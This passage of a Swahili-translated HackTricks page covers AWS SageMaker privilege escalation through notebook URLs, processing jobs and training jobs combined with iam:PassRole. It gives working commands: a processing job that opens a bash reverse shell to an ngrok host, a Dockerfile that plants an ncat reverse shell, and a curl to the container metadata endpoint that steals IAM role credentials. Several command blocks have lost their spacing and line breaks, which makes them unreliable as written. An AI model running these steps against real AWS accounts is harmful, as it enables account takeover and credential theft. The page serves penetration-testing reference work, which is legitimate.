Jibu linapaswa kuwa na uga wa NotebookInstanceArn, ambao utaleta ARN ya kifaa cha notebook kilichoundwa. Tunaweza kutumia API ya create-presigned-notebook-instance-url kuzalisha URL ambayo tunaweza kutumia kufikia kifaa cha notebook mara tu itakapokuwa tayari:
Nenda kwenye URL na bofya Fungua JupyterLab kulia juu, kisha shuka chini hadi kwenye kichupo cha "Mzinduzi" na chini ya sehemu ya "Nyingine", bonyeza kitufe cha "Terminal".
Sasa niwezekana kupata ufikiaji wa siri wa metadata ya Jukumu la IAM.
Athari Inayowezekana: Privesc kwa jukumu la huduma ya sagemaker lililoelezwa.
sagemaker:CreatePresignedNotebookInstanceUrl
Ikiwa kuna madokezo ya Jupyter yanayoendesha tayari na unaweza kuyapata kwa kutumia sagemaker:ListNotebookInstances (au kuyagundua kwa njia nyingine yoyote). Unaweza kuunda URL kwa ajili yao, kuyafikia, na kuiba siri kama ilivyoelezwa katika mbinu iliyopita.
Athari Inayowezekana: Privesc kwa jukumu la huduma ya sagemaker lililofungwa.
sagemaker:CreateProcessingJob,iam:PassRole
Mshambuliaji mwenye ruhusa hizo anaweza kufanya sagemaker kutekeleza kazi ya usindikaji na jukumu la sagemaker lililofungwa. Mshambuliaji anaweza kuonyesha ufafanuzi wa chombo ambacho kitakachofanywa katika kifaa cha akaunti ya AWS iliyosimamiwa na ECS, na kuiba vibali vya jukumu la IAM vilivyofungwa.
# I uploaded a python docker image to the ECRawssagemakercreate-processing-job \--processing-job-name privescjob \--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role># In my tests it took 10min to receive the shellcurl"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"#To get the creds
Athari Inayowezekana: Privesc kwa jukumu la huduma ya sagemaker iliyotajwa.
sagemaker:CreateTrainingJob, iam:PassRole
Mshambuliaji mwenye ruhusa hizo ataweza kuunda kazi ya mafunzo, kupiga chombo cha aina yoyote nacho kina jukumu limeambatanishwa nalo. Hivyo basi, mshambuliaji ataweza kuiba vibali vya jukumu.
Hali hii ni ngumu zaidi kuitumia kuliko ile ya awali kwa sababu unahitaji kuzalisha picha ya Docker itakayotuma rev shell au vibali moja kwa moja kwa mshambuliaji (hauwezi kutoa amri ya kuanza katika usanidi wa kazi ya mafunzo).
# Create docker imagemkdir/tmp/rev## Note that the trainning job is going to call an executable called "train"## That's why I'm putting the rev shell in /bin/train## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>cat>/tmp/rev/Dockerfile<<EOFFROM ubuntuRUN apt update && apt install -y ncat curlRUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/trainRUN chmod +x /bin/trainCMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/shEOFcd/tmp/revsudodockerbuild.-treverseshell# Upload it to ECRsudodockerlogin-uAWS-p$(awsecrget-login-password--region<region>)<id>.dkr.ecr.<region>.amazonaws.com/<repo>sudodockertagreverseshell:latest<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latestsudodockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
#To get the creds curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
**Athari Inayowezekana:** Privesc kwa jukumu la huduma ya sagemaker iliyotajwa.
## `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
Mshambuliaji mwenye ruhusa hizo (kwa uwezekano) ataweza kuunda **kazi ya mafunzo ya hyperparameter**, **kukimbia chombo cha aina yoyote** kwenye hiyo na **jukumu limeambatishwa** nayo.\
_Sijachunguza kwa sababu ya ukosefu wa muda, lakini inaonekana kama mbinu za zamani, jisikie huru kutuma PR na maelezo ya uvamizi._
# Marejeo
* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>